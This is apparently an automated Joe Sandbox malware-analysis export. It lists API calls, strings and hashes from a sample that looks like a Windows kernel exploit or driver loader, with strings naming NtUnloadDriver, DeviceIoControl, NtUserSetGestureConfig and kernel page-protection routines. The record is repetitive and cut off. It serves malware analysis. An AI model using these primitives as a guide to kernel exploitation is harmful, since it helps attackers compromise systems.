                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738F2F1A
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z.MSVCP140 ref: 00007FF7738F2F25
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2F35
                                                    • RegDeleteTreeW.ADVAPI32 ref: 00007FF7738F2F96
                                                      • Part of subcall function 00007FF7738EA7C0: ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA894
                                                      • Part of subcall function 00007FF7738EA7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA906
                                                      • Part of subcall function 00007FF7738EA7C0: ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7738EA94E
                                                      • Part of subcall function 00007FF7738EA7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA95C
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F2F5C
                                                    • RegDeleteTreeW.ADVAPI32 ref: 00007FF7738F2F77
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F2FDD
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F3032
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@_V01@W@std@@@std@@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@??6?$basic_ostream@_?good@ios_base@std@@?sputc@?$basic_streambuf@_DeleteTreeV01@@_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_AddressCloseHandleInitModuleOpenOsfx@?$basic_ostream@_ProcStringUnicodeV12@V21@@Vios_base@1@Vlocale@2@W@std@@
                                                    • String ID: "$NtUnloadDriver$SYSTEM\CurrentControlSet\Services\$[+] NtUnloadDriver Status 0x$[-] Driver Unload Failed!!$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
                                                    • API String ID: 2676758807-3977549460
                                                    • Opcode ID: a1bdb43c1ecff9b8d6c2fad003287c69e56737ca586bee21a79b0004c94f36db
                                                    • Instruction ID: 83f438eb9a98386fdf701e2ba2461ade3042937436d2f0c4c945183b8aa31c3d
                                                    • Opcode Fuzzy Hash: a1bdb43c1ecff9b8d6c2fad003287c69e56737ca586bee21a79b0004c94f36db
                                                    • Instruction Fuzzy Hash: 3A71B163B38A0395EF50AF65D4542BCE360FB94B98F800631DA5D66698DF3ED159C330
                                                    APIs
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7080
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E70C0
                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EC196
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EC1BE
                                                      • Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@ControlD@std@@@std@@DeviceU?$char_traits@V01@@$AcquireExclusiveHandleLockModule_invalid_parameter_noinfo_noreturnmemmovememset
                                                    • String ID: 0$ExReleaseResourceLite$NtUserSetGestureConfig$[!] Failed to find ExReleaseResourceLite$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 3251399726-2657333773
                                                    • Opcode ID: c0331179f477c252aaa19f7e8929f9201ef5c3b9b72d89fc378fedd66c78330d
                                                    • Instruction ID: 23616392945ab67d8dd919a3f3166d79f4e85857b811806d1b10932480d74d52
                                                    • Opcode Fuzzy Hash: c0331179f477c252aaa19f7e8929f9201ef5c3b9b72d89fc378fedd66c78330d
                                                    • Instruction Fuzzy Hash: 23916D73A38B4395EB80EB21E8506A9E3A0FB98788F804235ED5D67754DF3ED165C720
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDE91
                                                      • Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDEB4
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDF77
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDF9A
                                                      • Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID: PAGE$PAGELK$[!] Failed to find MmAllocateIndependentPagesEx$[!] Failed to find MmSetPageProtection$[-] Error allocating independent pages$[-] Failed to change page protections$x????xxxxxxxx????xxxxxxxxx????xxxxxxxx$xx????x???x?x????xxxxxxx????x
                                                    • API String ID: 3057132824-3125098887
                                                    • Opcode ID: c65bfcfda9cfef02c1c3b461ffcb51f887d8cd59c0a931d906dc0d7abb988730
                                                    • Instruction ID: f2228cf312c09806de92f42ac7ffe5bd225ec130efb8b5e44701e86833b0db88
                                                    • Opcode Fuzzy Hash: c65bfcfda9cfef02c1c3b461ffcb51f887d8cd59c0a931d906dc0d7abb988730
                                                    • Instruction Fuzzy Hash: A4514F63A38B4391EA80EB55F4402B5E3A0BF94784FC40235E94C6B655EF7EE568C730
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$EtwB$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-3808327900
                                                    • Opcode ID: cf66b3f38dcf4d3a9a7327c216e93a6944e3f795d947650dbe4c5c7819eeb512
                                                    • Instruction ID: b3e9d8a16b0a4305981f42081e9b6b4d8c7647446c50d9d48e14c4e19b2c05f0
                                                    • Opcode Fuzzy Hash: cf66b3f38dcf4d3a9a7327c216e93a6944e3f795d947650dbe4c5c7819eeb512
                                                    • Instruction Fuzzy Hash: C5516B32B38B4299EB41AB61E4406A9B3B5FB48788F944236DE4D27718DF3ED125C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 4a16b1ada031b150b2b8d2dcce7d48610a6e21dd2b4b51e815d46b0d6f9e9645
                                                    • Instruction ID: 0de819c18e7b6b3a05c63e774e0cff394a677f3feb81e6df03f1b3c1fa3ad2c3
                                                    • Opcode Fuzzy Hash: 4a16b1ada031b150b2b8d2dcce7d48610a6e21dd2b4b51e815d46b0d6f9e9645
                                                    • Instruction Fuzzy Hash: 3B518F33B39B4299EB51EB60E4502ADB3A4BB48788F944236DE4D27758EF3DD125C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 0189528ef7c060203cb5a5ab4d0c9625ade21ed828765cb2f23712110881f831
                                                    • Instruction ID: 6e092cbf00b3d80279d97d0f89f3ebad7e0683974b6fc8441c755f26be5c6ba1
                                                    • Opcode Fuzzy Hash: 0189528ef7c060203cb5a5ab4d0c9625ade21ed828765cb2f23712110881f831
                                                    • Instruction Fuzzy Hash: 2A517D33B79B4299EB50EB60E4802ADA7B0BB48788F844136DE4D67754DF3DD525C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 06b1d522afc2fc725674bda80df19a16bdf6ef3f2e5376094a840899f2687690
                                                    • Instruction ID: 9c581ce27a505990b08f79e8f758cd98ddb9a93c24a42eb2d8931bf0ee46dd9a
                                                    • Opcode Fuzzy Hash: 06b1d522afc2fc725674bda80df19a16bdf6ef3f2e5376094a840899f2687690
                                                    • Instruction Fuzzy Hash: 50519033B38B4289EB51EB61E8402A9B3B0BB48788F940235DE4C23754DF3DD129C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 039b7fc1059e6048e64b06d3a02e17fc5b2c72a20a02f9f7bcf2363af708e68e
                                                    • Instruction ID: 38ac9b7a5b3c703d4484a006fdf5a17d16a199e05be73808d231d7cbd3149445
                                                    • Opcode Fuzzy Hash: 039b7fc1059e6048e64b06d3a02e17fc5b2c72a20a02f9f7bcf2363af708e68e
                                                    • Instruction Fuzzy Hash: 4B515C33B38B4299EB50EB60E8502A9B3B4BB48788F944236DE4D67754DF3DD525C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: de231e250a37e9cfbd19bf2b748ef2b0fbae5512ce2dc155a550e27e2751eba5
                                                    • Instruction ID: 9445923096798243a18b15eb9baf9ec1c32683399eae49afa6f603bdde91704d
                                                    • Opcode Fuzzy Hash: de231e250a37e9cfbd19bf2b748ef2b0fbae5512ce2dc155a550e27e2751eba5
                                                    • Instruction Fuzzy Hash: 32517F37B38B5289EB50EB60E8402A9B3B4BB58788F945136DE4D27754EF3DD129C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: cda18cfaedf71214e2580422a616da068b0d926fcd9c1f401b8ab5f2bbca997e
                                                    • Instruction ID: 37b0a3922c70bdd02a36f91b5437f94bf5c6530148542b8c44e7c2b4ba403d79
                                                    • Opcode Fuzzy Hash: cda18cfaedf71214e2580422a616da068b0d926fcd9c1f401b8ab5f2bbca997e
                                                    • Instruction Fuzzy Hash: 73515937B38B4289EB41EB61E4402ADB3B4BB58788F944236DE4D27758DE3DD129C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 696fafbb10d234c9b031ff39d56c918c4f95ceb4b059a0e50e847bfe7e58d082
                                                    • Instruction ID: b81afc4bddba95427400d2faf3a8ac4879d5a152391fc73c82c824927bb4d192
                                                    • Opcode Fuzzy Hash: 696fafbb10d234c9b031ff39d56c918c4f95ceb4b059a0e50e847bfe7e58d082
                                                    • Instruction Fuzzy Hash: FA516D37B38B4289EB41EB61E4402AAB7B0BB58788F944236DE4D27754DF3DD129C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 5a8b8bb835ced192fd94a3754e2a7d1210578acb61fbe328b7f7acd386f9278f
                                                    • Instruction ID: 26da0ccc6f1bf040a3eab05ffe35779d7326da03e155483b8518d7045ce8fd55
                                                    • Opcode Fuzzy Hash: 5a8b8bb835ced192fd94a3754e2a7d1210578acb61fbe328b7f7acd386f9278f
                                                    • Instruction Fuzzy Hash: 5B517F37B38B4299EB41AB60E8502A9B3A4FB48788F844235DE4D27B54DF3DD129C760
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7738EBF8C
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7738EBFB4
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7738EBFED
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738EC07B
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738EC12F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 3ae26c6a1d4a30df7b314448e0ede12cafd3c87fecc513ff00560ec475eee002
                                                    • Instruction ID: af277553cb5b77824c27968519ee924758a45edfa24a402b43b14f3294136296
                                                    • Opcode Fuzzy Hash: 3ae26c6a1d4a30df7b314448e0ede12cafd3c87fecc513ff00560ec475eee002
                                                    • Instruction Fuzzy Hash: C2517D33B38B4299EB40EB60E4502A9B3B0BB58788F844236DE4D27754DF3DD129C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: b3bf6dfa7214b6056b035d8a34bf148732bd822a1a6b1dfc7babd26445247d4e
                                                    • Instruction ID: 1b543144f80d95b74c7db8cceda29493dce8ad61b09459b4ce171da3a8069ec6
                                                    • Opcode Fuzzy Hash: b3bf6dfa7214b6056b035d8a34bf148732bd822a1a6b1dfc7babd26445247d4e
                                                    • Instruction Fuzzy Hash: F3516C37B38B4299EB40EB60E4502A9B3A4FB58788F944236DE4D2B754DF3DD129C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
